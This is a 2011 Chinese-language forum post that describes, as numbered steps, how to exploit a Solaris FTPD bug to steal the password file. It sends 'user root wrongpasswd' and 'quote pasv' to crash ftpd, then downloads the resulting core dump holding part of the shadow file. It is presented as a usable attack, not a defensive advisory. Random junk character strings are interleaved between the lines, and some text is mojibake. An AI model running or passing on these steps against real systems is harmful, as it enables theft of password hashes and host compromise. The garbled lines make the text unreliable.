該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG����,使得用戶可以獲得該機(jī)的口令文件。具體過程如下:
{: Z" f' O9 t( e" J7 u( s* X7 t
1.通過 ftp 正常登錄到目的主機(jī)上
( e7 |! s1 r$ G# T8 ~4 }( m6 M0 R$ j0 Q. |
2.輸入如下命令序列:
1 u* v5 g& H4 z2 z+ h6 m- x' Q! O) s w- q- g& z
ftp> user root wrongpasswd
9 H) @$ L+ u5 O( C' I
3 b3 j6 A$ V# [2 Dftp> quote pasv
8 z8 H; ]1 d4 [& m3 H4 V; H3 f8 b
/ ^. J% G/ h$ d8 q6 N3.這時(shí)����,ftpd會(huì)報(bào)錯(cuò)退出���,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中�。6 p3 ^& T4 M4 y+ ]
4 M5 @- P/ {1 Q, e% c
4.再次進(jìn)入FTP >get core
7 s/ S- r/ r7 B/ _8 V4 |! t
0 P J7 Y" u m3 g補(bǔ)充:雖然在core只有一部分shadow�,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了2 X6 B% I" D2 Q/ ?% g8 x
& M E+ T' D! f6 ~: [
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡